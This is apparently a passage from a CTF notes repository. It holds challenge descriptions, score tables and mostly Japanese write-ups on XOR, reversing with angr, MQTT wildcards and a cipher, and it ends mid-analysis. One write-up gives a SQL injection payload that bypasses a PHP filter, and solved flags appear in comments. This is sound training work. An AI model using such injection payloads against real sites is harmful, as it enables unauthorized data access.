"/2020/pbctf_2020/Apoche_I/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Try hacking my old version of apoche. Here are a list of running services. DM an admin if none of those work:\n\n```\nhttp://34.68.159.75:37173\nhttp://34.68.159.75:41521\nhttp://34.68.159.75:39733\nhttp://34.68.159.75:55275\nhttp://34.68.159.75:52555\n```\n\nHint: There's something fishy about this apoche instance, if only there was a way to view the binary...\n\nBy: theKidOfArcrania" }, { "alpha_fraction": 0.6357142925262451, "alphanum_fraction": 0.800000011920929, "avg_line_length": 27.200000762939453, "blob_id": "b16234c710589913bcfb77fb57e7344acf528595", "content_id": "303d98192054cb0a6df4e81e5c28ac0cbb438c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 140, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/UMassCTF_2021/Scan_Me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The top layer is a lie.\n\nhttp://static.ctf.umasscybersec.org/misc/8e0111c9-d8d0-4518-973d-dbdcbd9d5a42/scan_me.xcf\n\nCreated by Seltzerz#6678" }, { "alpha_fraction": 0.2890207767486572, "alphanum_fraction": 0.3471810221672058, "avg_line_length": 47.17142868041992, "blob_id": "c09654f16a78132b5c95e981a143bd3c6c019f45", "content_id": "2126ceda5d6438ad42f494e23ed8ef80114869f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1688, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/2021/angstromCTF_2021/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# ångstromCTF 2021\n\n* https://2021.angstromctf.com/\n\n* 2021/04/03 09:00 JST — 2021/04/08 09:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ---------------------------------------------------------- | -------------------- | ----: | -----: |\n| Misc | [Archaic](Archaic) | Linux Command | 50 | 876 |\n| Crypto | [Exclusive Cipher](Exclusive_Cipher) | XOR | 40 | 505 |\n| Misc | [Fish](Fish) | PNG alpha | 60 | 774 |\n| Crypto | [Follow_the_Currents](Follow_the_Currents) | Brute force | 70 | 272 |\n| Reversing | [FREE FLAGS!!1!!](FREE_FLAGS!!1!!) | | 50 | 746 |\n| Crypto | [I'm so Random](Im_so_Random) | PRNG | 100 | 240 |\n| Crypto | [Keysar v2](Keysar_v2) | Frequency Analysis | 40 | 575 |\n| Crypto | [Relatively Simple Algorithm](Relatively_Simple_Algorithm) | RSA | 40 | 730 |\n| Web | [Sea of Quills](Sea_of_Quills) | SQLite | 70 | 388 |\n| Crypto | [sosig](sosig) | RSA, Wiener's attack | 70 | 510 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n\n---\n\n## Result\n\n* 595 points\n\n* 367 / 1245 (> 1 pt)" }, { "alpha_fraction": 0.6832432150840759, "alphanum_fraction": 0.745945930480957, "avg_line_length": 23.342105865478516, "blob_id": "320b980598531d783757160090d953d6d9d9ee98", "content_id": "b54a543ae1c91221c4f3a4cfea7121fafdaa229a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1335, "license_type": "no_license", "max_line_length": 215, "num_lines": 38, "path": "/2021/WaniCTF21-spring/secret/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "この問題では Linux の ELF 実行ファイル(バイナリ)である「secret」が配布されています。\n\nこのバイナリを実行すると `secret key` を入力するように表示されます。\n\n試しに「abcde」と入力してみると「Incorrect」と言われました。\n\n```\n$ file secret\nsecret: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1daf4ab43cfa357911806c3ccae34a1b6e027913, for GNU/Linux 3.2.0, not stripped\n\n$ sudo chmod +x secret\n\n$ ./secret\n...\nInput secret key : abcde\nIncorrect\n\n$ ./secret\n...\nInput secret key : ??????\nCorrect! Flag is ??????\n```\n\nこのバイナリが正しいと判断する `secret key` を見つけて読み込んでみましょう!\n\n(`secret key` とフラグは別の文字列です)\n\n(このファイルを実行するためには Linux 環境が必要となりますので WSL や VirtualBox で用意してください)\n\nヒント :「表層解析」や「静的解析」を行うことで `secret key` が見つかるかも...?\n\n表層解析ツール [strings](https://linux.die.net/man/1/strings)\n\n静的解析ツール [Ghidra](https://ghidra-sre.org/)\n\n[rev-secret.zip](https://score.wanictf.org/storage/aguk6i4m2ri4qt46ys3oxl4s26xow2l0/rev-secret.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.28060606122016907, "alphanum_fraction": 0.3383333384990692, "avg_line_length": 133.7142791748047, "blob_id": "2fe5ea3016dd8e766cbd0bef8bf5976134e7b5fd", "content_id": "bd52ad7d4855651ff2397a5574b52c672c714c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6601, "license_type": "no_license", "max_line_length": 161, "num_lines": 49, "path": "/2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# List of challenges\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------------------------ | ------------------------------------ | ----: | -----: |\n| Web | [Cyberwall](CyberSecurityRumble2020/Cyberwall) | OS Command Injection | 100 | 389 |\n| | [Wheels n Whales](CyberSecurityRumble2020/Wheels_n_Whales) | PyYAML | 100 | 94 |\n| | [Password Pandemonium](SunshineCTF/Password_Pandemonium) | javascript | 100 | 271 |\n| | [DevTools_1](WaniCTF/DevTools_1) | devtool | 100 | 163 |\n| | [DevTools_2](WaniCTF/DevTools_2) | devtool | 101 | 154 |\n| | [Simple Memo](WaniCTF/Simple_Memo) | directory traversal | 101 | 135 |\n| | [striped table](WaniCTF/striped_table) | XSS | 101 | 111 |\n| | [SQL Challenge 1](WaniCTF/SQL_Challenge_1) | SQL injection w/o spaces | 102 | 71 |\n| | [SQL Challenge 2](WaniCTF/SQL_Challenge_2) | SQL injection w/o special characters | 105 | 50 |\n| | [Apoche I](pbctf_2020/Apoche_I) | robots.txt, directory traversal | 52 | 52 |\n| | [Sploosh](pbctf_2020/Sploosh) | Splash, Webhook | 156 | 76 |\n| | [Lynx](kksctf_open_2020/Lynx) | Lynx, robots.txt | 204 | 113 |\n| | [What time is it now?](Harekaze_mini_CTF_2020/What_time_is_it_now) | date command | 123 | 63 |\n| Crypto | [Hashfun](CyberSecurityRumble2020/Hashfun) | XOR | 100 | 267 |\n| | [Pady McPadface](CyberSecurityRumble2020/Pady_McPadface) | Quadratic residue | 200 | 18 |\n| | [Oh_Sheet](SquareCTF2020/Oh_Sheet) | google spreadsheet | 200 | 95 |\n| | [Hash_My_Awesome_Commands](SquareCTF2020/Hash_My_Awesome_Commands) | timing attack | 150 | 51 |\n| | [Magically Delicious](SunshineCTF/Magically_Delicious) | octal | 100 | 180 |\n| | [Veni, vidi](WaniCTF/Veni_vidi) | ROT13 | 101 | 152 |\n| | [exclusive](WaniCTF/exclusive) | XOR | 101 | 96 |\n| | [Basic RSA](WaniCTF/Basic_RSA) | RSA | 102 | 76 |\n| | [LCG crack](WaniCTF/LCG_crack) | LCG | 105 | 48 |\n| | [l0g0n](WaniCTF/l0g0n) | CVE-2020-1472(Zerologon) | 111 | 33 |\n| | [Ainissesthai](pbctf_2020/Ainissesthai) | Enigma | 53 | 59 |\n| | [Queensarah2](pbctf_2020/Queensarah2) | Sarah2 Cipher | 200 | 37 |\n| | [fonction_spéciale](kksctf_open_2020/fonction_speciale) | Look(Count)-and-say sequence | 240 | 91 |\n| | [rsa](Harekaze_mini_CTF_2020/rsa) | RSA encrypt p and q | 186 | 25 |\n| Reversing | [Zeh](CyberSecurityRumble2020/Zeh) | XOR | 100 | 221 |\n| | [Welcome](HITCON_CTF_2020/Welcome) | ssh | 50 | 715 |\n| | [SSE_KEYGENME](KipodAfterFreeCTF/SSE_KEYGENME) | angr | 25 | 127 |\n| | [Hotel Door Puzzle](SunshineCTF/Hotel_Door_Puzzle) | angr | 100 | 195 |\n| Forensics | [AC1750](HITCON_CTF_2020/AC1750) | CVE-2020-10882, pcap | 168 | 100 |\n| | [logged_flag](WaniCTF/logged_flag) | key logger | 101 | 126 |\n| | [ALLIGATOR_01](WaniCTF/ALLIGATOR_01) | volatility, pstree | 102 | 83 |\n| | [ALLIGATOR_02](WaniCTF/ALLIGATOR_02) | volatility, consoles | 102 | 76 |\n| | [chunk_eater](WaniCTF/chunk_eater) | PNG chunk | 102 | 71 |\n| | [ALLIGATOR_03](WaniCTF/ALLIGATOR_03) | volatility, hashdump | 104 | 58 |\n| | [zero_size_png](WaniCTF/zero_size_png) | PNG CRC32, zlib | 107 | 40 |\n| Pwn | [speedrun-00](SunshineCTF/speedrun-00) | stack overflow | 10 | 226 |\n| Misc | [Find a Number](WaniCTF/Find_a_Number) | binary search | 101 | 111 |\n| | [MQTT Challenge](WaniCTF/MQTT_Challenge) | MQTT | 103 | 65 |\n| | [Not-stego](pbctf_2020/Not-stego) | ascii | 26 | 135 |\n| | [GCombo](pbctf_2020/GCombo) | Google Forms | 36 | 92 |\n| | [motor_sounds](kksctf_open_2020/motor_sounds) | G-code | 268 | 77 |\n| | [bson](kksctf_open_2020/bson) | MessagePack | 331 | 53 |" }, { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.8021582961082458, "avg_line_length": 91.66666412353516, "blob_id": "b8fb8f62514411b0fd12222f68f287a0a926a912", "content_id": "ae903fe2c5296e1cbc8b15f721138b9a4b825653", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 278, "license_type": "no_license", "max_line_length": 141, "num_lines": 3, "path": "/2021/dCTF_2021/Extraterrestrial_Communication/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Aliens have recently landed on the moon and are attempting to communicate with us. Can you figure out what they are trying to tell us?\n\n[A_message_from_outer_space.mp3](https://dctf.dragonsec.si/files/3e7843af95192bfa26efbd783446e724/A_message_from_outer_space.mp3?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTA0fQ.YJ-0ig.9cwFhVXn7yiIzStxznAfen208qk)\n" }, { "alpha_fraction": 0.573825478553772, "alphanum_fraction": 0.7617449760437012, "avg_line_length": 29.86206817626953, "blob_id": "ae519929ea577859eb2bda2b78ab0ec6b2c1df10", "content_id": "290be3eaf985808928a5af589d56bfe2a8241514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1102, "license_type": "no_license", "max_line_length": 254, "num_lines": 29, "path": "/2021/angstromCTF_2021/Exclusive_Cipher/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nフラグのフォーマットである`actf{`とXORをとってkeyを見つける。ただし、文字列中にフラグが埋め込まれているので、先頭文字から順番にkey候補を調べていく必要がある。\n\n```py\nfrom itertools import cycle\nimport string\n\nc = 'ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c'\nc = bytes.fromhex(c)\nm = b'actf{'\n\ndef xor(text,key):\n return bytes([a ^ b for (a,b) in zip(text, cycle(key))])\n\ndef is_ascii(text):\n return all(char in bytes(string.printable,'ascii') for char in text)\n\nwhile len(c) > len(m):\n key = xor(c,m)[:5]\n plaintext = xor(c,key)\n if is_ascii(plaintext) and b'}' in plaintext:\n print(plaintext)\n c = c[1:]\n```\n\nいくつか平文候補が見つかるが、文章として成り立っているものを選択。\n\n<!-- actf{who_needs_aes_when_you_have_xor}. Good luck on the other crypto! -->" }, { "alpha_fraction": 0.5389397740364075, "alphanum_fraction": 0.632526159286499, "avg_line_length": 22.335878372192383, "blob_id": "4c9ba071d2133629510e6ed3ea0461916f6d4d82", "content_id": "4f34904f3b723f28c2a85b3a3a8ee5dfce58f625", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3506, "license_type": "no_license", "max_line_length": 197, "num_lines": 131, "path": "/2020/CyberSecurityRumble2020/Zeh/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define Hauptroutine main\n#define nichts void\n#define Ganzzahl int\n#define schleife(n) for (Ganzzahl i = n; i--;)\n#define bitrverschieb(n, m) (n) >> (m)\n#define diskreteAddition(n, m) (n) ^ (m)\n#define wenn if\n#define ansonsten else\n#define Zeichen char\n#define Zeiger *\n#define Referenz &\n#define Ausgabe(s) puts(s)\n#define FormatAusgabe printf\n#define FormatEingabe scanf\n#define Zufall rand()\n#define istgleich =\n#define gleichbedeutend ==\n\nnichts Hauptroutine(nichts) {\n Ganzzahl i istgleich Zufall;\n Ganzzahl k istgleich 13;\n Ganzzahl e;\n Ganzzahl Zeiger p istgleich Referenz i;\n\n FormatAusgabe(\"%d\\n\", i);\n fflush(stdout);\n FormatEingabe(\"%d %d\", Referenz k, Referenz e);\n\n schleife(7)\n k istgleich bitrverschieb(Zeiger p, k % 3);\n\n k istgleich diskreteAddition(k, e);\n\n wenn(k gleichbedeutend 53225)\n Ausgabe(Fahne);\n ansonsten\n Ausgabe(\"War wohl nichts!\");\n}\n```\n\n`#define`によって関数名が書き換わっていて分かりづらいので元に戻してみる。\n\n```c\n#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define forloop(n) for (int i = n; i--;)\n#define rightshift(n, m) (n) >> (m)\n#define xor(n, m) (n) ^ (m)\n\nvoid main(void) {\n int i = rand();\n int k = 13;\n int e;\n int * p = & i;\n\n printf(\"%d\\n\", i);\n fflush(stdout);\n scanf(\"%d %d\", & k, & e);\n\n forloop(7)\n k = rightshift(* p, k % 3);\n\n k = xor(k, e);\n\n if(k == 53225)\n puts(Fahne);\n else\n puts(\"War wohl void!\");\n}\n```\n\n処理の流れは以下の通り。\n\n1. ![i](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+i) をprintf\n\n1. ![e,k](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+e%2Ck) を入力\n\n1. ![k = (*p) \\gg (k \\mod 3)](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+k+%3D+%28%2Ap%29+%5Cgg+%28k+%5Cmod+3%29) を7回\n\n1. ![53325 = k \\oplus e](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+53325+%3D+k+%5Coplus+e)\n\n`nc`してみると常に`1804289383`が返ってくるので`i`は固定っぽい。\n\n```bash\n$ nc chal.cybersecurityrumble.de 65123\n1804289383\n```\n\n最終的に k = 53225 になるように逆算していけば良さそう。\n\n(3)式で、何回ループを回しても *p 自体は変化しないので、k は *p を 0,1,2右シフトした3通りのパターンのいずれかになる。\n\n| シフト | *p |\n| --- | ---------- |\n| 0 | 1804289383 |\n| 1 | 902144691 |\n| 2 | 451072345 |\n\nそして、それぞれに対して k = 53225 となる e を計算すると次のようになる。\n\n![*p \\oplus e =53225 \\Leftrightarrow e = *p \\oplus 53225](https://render.githubusercontent.com/render/math?math=%5Cdisplaystyle+%2Ap+%5Coplus+e+%3D53225+%5CLeftrightarrow+e+%3D+%2Ap+%5Coplus+53225)\n\n* [競技プログラミングにおけるXORのTips](https://qiita.com/kuuso1/items/778acaa7011d98a3ff3a)\n\n\n| シフト | *p | e |\n| --- | ---------- | ---------- |\n| 0 | 1804289383 | 1804307086 |\n| 1 | 902144691 | 902131034 |\n| 2 | 451072345 | 451026608 |\n\nよって、`0 1804307086`, `0 902131034`, `0 451026608`のいずれかは k = 53225 になるはずである。\n\n```bash\n$ nc chal.cybersecurityrumble.de 65123 \n1804289383 \n0 1804307086 \n```\n\n<!-- CSR{RUECKWARTSINGENEUREN} -->" }, { "alpha_fraction": 0.6450381875038147, "alphanum_fraction": 0.7748091816902161, "avg_line_length": 31.875, "blob_id": "c4c850cc8dea259ac84399fab236ec53b9c8cf34", "content_id": "93946de673393ecd3e939893a36273e3b88c5635", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 118, "num_lines": 8, "path": "/2020/hxp_CTF_2020/nanothorpe/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Description:\nWelcome back to ls-as-a-service, the most useful tool on the internet!\n\nDownload:\n[nanothorpe-d2095dcfeda4b08d.tar.xz (13.3 KiB)](https://2020.ctf.link/assets/files/nanothorpe-d2095dcfeda4b08d.tar.xz)\n\nConnection (mirrors):\nhttp://157.90.22.14:8832/" }, { "alpha_fraction": 0.6751739978790283, "alphanum_fraction": 0.7208043336868286, "avg_line_length": 28.976743698120117, "blob_id": "9bec45cb05fd50689678242cd813beee7e4d6980", "content_id": "a0c712bd8d7ad41074c69b4bb6da7edc9fd16413", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1391, "license_type": "no_license", "max_line_length": 224, "num_lines": 43, "path": "/2020/SunshineCTF/Hotel_Door_Puzzle/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`file`コマンドでファイルの形式を調べる。\n\n```bash\n$ file hotel_key_puzzle \nhotel_key_puzzle: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c4add21a28170d0828bedc432f1ed178007be0d0, for GNU/Linux 3.2.0, not stripped\n```\n\n実行してみる。\n\n```bash\n$ ./hotel_key_puzzle \nHotel Orlando Door Puzzle v1\n----------------------------\nThis puzzle, provided by Hotel Orlando, is in place to give the bellhops enough time to get your luggage to you.\nWe have really slow bellhops and so we had to put a serious _time sink_ in front of you.\nHave fun with this puzzle while we get your luggage to you!\n\n\t-Hotel Orlando Bellhop and Stalling Service\n\nYour guess, if you would be so kind: \nhoge\nSadly, that is the incorrect key. If you would like, you could also sit in our lobby and wait.\n```\n\n正しいkeyを入力すれば良さそうなので、angrを使って調べる。\n\n```py\nimport angr\n\np = angr.Project('hotel_key_puzzle')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0x22BA-0x221B)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))\n```\n\n<!-- sun{b3llh0p5-runn1n6-qu1ckly} -->\n\n\n\n\n" }, { "alpha_fraction": 0.7057142853736877, "alphanum_fraction": 0.7342857122421265, "avg_line_length": 17.473684310913086, "blob_id": "6618a16ae0f89926cf47a6c0bfb4b5e2c7e17ab6", "content_id": "991009d8d8394e1e8d8592be28d04e3f04ce980d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 350, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/2021/BCACTF_2.0/Storytime_The_Opening_Gambit/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gather around, it's time for a story! I've even included a reward at the end!\n\n[story](https://objects.bcactf.com/bcactf2/storytime-1/story)\n\nHint 1 of 4\n\nI don't think that's the whole story.\n\nHint 2 of 4\n\nHow can you look into a compiled executable file?\n\nHint 3 of 4\n\nMaybe a command line tool will help?\n\nHint 4 of 4\n\nWhat can you make with wool?" }, { "alpha_fraction": 0.603210985660553, "alphanum_fraction": 0.7201834917068481, "avg_line_length": 18, "blob_id": "98a08f4aac84fab216ccca7c165481fcb1204da6", "content_id": "9742ffd8bd0e435cf352dee259f454ee3a22f35d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 676, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/2020/WaniCTF/MQTT_Challenge/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nサブスクライブした topic の内容を表示する仕組みになっている。\n\n![](img/2020-11-22-12-56-09.png)\n\nさすがに `nkt/flag` ではダメだった。\n\n![](img/2020-11-22-12-57-17.png)\n\nすべてをサブスクライブに指定したいので、MQTTのワイルドカードについて調べると、`#`を使えばよいことが分かった。\n\n[参考]\n\n* http://devcenter.magellanic-clouds.com/learning/mqtt-spec.html\n\n`#`をサブスクライブするとフラグが取得できた。\n\n`top/secret/himitu/daiji/mitara/dame/zettai/flag` にあるらしい。\n\n![](img/2020-11-22-13-06-22.png)\n\n<!-- FLAG{mq77_w1ld_c4rd!!!!_af5e29cb23} -->" }, { "alpha_fraction": 0.7315436005592346, "alphanum_fraction": 0.7852349281311035, "avg_line_length": 39.727272033691406, "blob_id": "aff31ba96c72f26c5c30b67457151e2b7d500d43", "content_id": "a55b82efe5339dbe5b5096c8293c836d028e83da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 447, "license_type": "no_license", "max_line_length": 143, "num_lines": 11, "path": "/2021/UMassCTF_2021/notes/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The breach seems to have originated from this host. Can you find the user's mistake? Here is a memory image of their workstation from that day.\n\nhttp://static.ctf.umasscybersec.org/forensics/13096721-bb26-4b79-956f-3f0cddebd49b/image.mem\n\nCreated by [breeze]#3600\n\n<details><summary>View Hint</summary>\n\nThere wasn't any suspicious network activity or anything... it's almost as if they just had their passwords up right on the screen.\n\n</details>" }, { "alpha_fraction": 0.5063291192054749, "alphanum_fraction": 0.6708860993385315, "avg_line_length": 15, "blob_id": "87158dae420c13e446cf64403648ba7bf8e1d9db", "content_id": "235dbbc5afc204c9a79034c047f0095046fd90c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 79, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/1597/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "... as in https://xkcd.com/1597/\n\nhttp://git.ritsec.club:7000/1597.git/\n\n~knif3" }, { "alpha_fraction": 0.7010869383811951, "alphanum_fraction": 0.7880434989929199, "avg_line_length": 19.44444465637207, "blob_id": "86e9275083f7c478d28c2d1672eb8354948879a9", "content_id": "a6dd75d061c6b82fb1e079a973c458db88b9031c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 196, "license_type": "no_license", "max_line_length": 95, "num_lines": 9, "path": "/2021/WaniCTF21-spring/OUCS/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "OUによるHomomorphicなCryptoSystemです\n\n```\nnc oucs.cry.wanictf.org 50010\n```\n\n[cry-oucs.zip](https://score.wanictf.org/storage/te7faf387uziv3gkvxwgz05jy2u86ma4/cry-oucs.zip)\n\nWriter : Laika\n" }, { "alpha_fraction": 0.6822429895401001, "alphanum_fraction": 0.8177570104598999, "avg_line_length": 22.77777862548828, "blob_id": "c09e1b24aaf10ee875717b5857774f65a6f9d9c6", "content_id": "5694104ba7cf18bc69199ff591d0651052fc75e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 262, "license_type": "no_license", "max_line_length": 94, "num_lines": 9, "path": "/2021/SECCON_Beginners_CTF_2021/Imaginary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "虚数は好きですか?\n\n接続方法: nc imaginary.quals.beginners.seccon.jp 1337\n\nソースコード: [app.py](https://beginners-dist-production.s3.isk01.sakurastorage.jp/imaginary/app.py)\n\n4b5e2d8cbe6aad1156ae88a823b5c3a5896ef48e\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.5227272510528564, "alphanum_fraction": 0.8484848737716675, "avg_line_length": 43.33333206176758, "blob_id": "325a5df3f151897d1519d2b19fb78485b91344e3", "content_id": "76e903db488902713e3f94019370ccd2352aeb98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 113, "num_lines": 3, "path": "/2021/PlaidCTF_2021/xorsa/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XOR + RSA = XORSA\n\n[Download](https://plaidctf.com/files/xorsa.29fb8e0ef0173eef5953d792373b7db98169018db6747f5e27d26c1c7cb98873.tgz)" }, { "alpha_fraction": 0.6634615659713745, "alphanum_fraction": 0.7115384340286255, "avg_line_length": 16.33333396911621, "blob_id": "543b30183c815ebc5fc5ad2c6b643c21445317ad", "content_id": "001d52d867878d0ac02681ce922748d5f24da26a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "no_license", "max_line_length": 35, "num_lines": 6, "path": "/2021/HeroCTF_v3/PwnQL_#1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Login as admin to get the flag.\n\nURL : http://chall1.heroctf.fr:8080\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.7350427508354187, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 38, "blob_id": "97ce1a99001283d527d085fb44dd6a4d2195e13c", "content_id": "99b849001410e5be6c90b303d55dbbcc126c5a1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 66, "num_lines": 3, "path": "/2021/BCACTF_2.0/Infinite_Zip/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here's a zip, there's a zip. Zip zip everywhere.\n\n[flag.zip](https://objects.bcactf.com/bcactf2/zipproblem/flag.zip)\n" }, { "alpha_fraction": 0.6094147562980652, "alphanum_fraction": 0.6513994932174683, "avg_line_length": 27.10714340209961, "blob_id": "46099779b6ec5f4b4075615d48e67a1b16e91ca1", "content_id": "0f850fa137a9b16209e0c5dd7531926f48773a06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/2020/WaniCTF/SQL_Challenge_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nSQLインジェクションをしてフラグを入手する。ただし、使えるクエリ文字列には制限がある。\n\n```php\n//一部の文字は利用出来ません。以下の文字を使わずにFLAGを手に入れてください。\nif (preg_match('/\\s/', $year))\n exit('危険を感知'); //スペース禁止\nif (preg_match('/[\\']/', $year))\n exit('危険を感知'); //シングルクォート禁止\nif (preg_match('/[\\/\\\\\\\\]/', $year))\n exit('危険を感知'); //スラッシュとバックスラッシュ禁止\nif (preg_match('/[\\|]/', $year))\n exit('危険を感知'); //バーティカルバー禁止 \n\n//クエリを作成する。\n$query = \"SELECT * FROM anime WHERE years =$year\";\n```\n\nクエリパラメータに`(2016)OR(1=1)`を与える。すると、`SELECT * FROM anime WHERE years =(2016)OR(1=1)`が実行されてすべての`anime`カラムが取得できる。\n\nhttps://sql1.wanictf.org/index.php?year=(2016)OR(1=1)\n\n[参考]\n\n* https://security.stackexchange.com/questions/127655/would-removing-spaces-in-a-string-protect-against-sql-injection\n\n<!-- FLAG{53cur3_5ql_a283b4dffe}\t -->" }, { "alpha_fraction": 0.6673792004585266, "alphanum_fraction": 0.7315092086791992, "avg_line_length": 22.636363983154297, "blob_id": "dd438f4bdf4aa83d8689909108bc794c1b4bec56", "content_id": "84f7e1d666ba9e9ae0fea949f173469f88e78dbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3331, "license_type": "no_license", "max_line_length": 102, "num_lines": 99, "path": "/2020/pbctf_2020/Queensarah2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n`nc`コマンドを実行してみると文字列が出力され、パスワードを求められる。\n\n入力したパスワードが違ったときは、そのパスワードを暗号化してくれるっぽい。\n\n```bash\n$ nc queensarah2.chal.perfect.blue 1\nThis is a restricted service! Decrypt this password to proceed:\n{'ywflzvbwvvyrmtfsgwiuanwgxpdfmztdgcgvqalohrnibwjl_pxrwiuaou'}\n> password\nThat's not quite right. Your password encrypts to this:\nvbfxjxpn\n> hello\nThat's not quite right. Your password encrypts to this:\nqw_qxn\n> pbctf\nThat's not quite right. Your password encrypts to this:\nbdqlck\n> a\nThat's not quite right. Your password encrypts to this:\ny_\n> aa\nThat's not quite right. Your password encrypts to this:\nsr\n> aaa\nThat's not quite right. Your password encrypts to this:\nlguh\n```\n\nプログラムを読むと、以下のように暗号化していることが分かる。\n\n例として、文字列 `hello` を暗号化する手順を示す。\n\n---\n\n1. `[a-z_]`のバイグラムを別のバイグラムに対応させた辞書`S_box`をランダムに作る(27\\*27通り)\n\n `{'he':'de', 'll':'dg', 'o_':'at' , ...}`\n\n1. 入力文字列の長さが奇数なら末尾に'_'をつける\n\n `hello` ⇒ `hello_`\n\n1. 辞書をもとに先頭から2文字ずつ変換する\n\n `hello_` ⇒ `dedgat`\n\n1. 文字列を偶数番目と奇数番目に分けてつなげる(シャッフル)\n\n `dedgat` ⇒ `dda`+`egt` ⇒ `ddaegt`\n\n1. 2~4 を `2 * ceil(log(len(message), 2))`回繰り返す (ただし最後の1回はシャッフルしない)\n\n `hello_` ⇒ `ddaegt` ⇒ `fgjtth` ⇒ `vlvued` ⇒ `ziagnh` ⇒ `yxl_tz` ⇒ 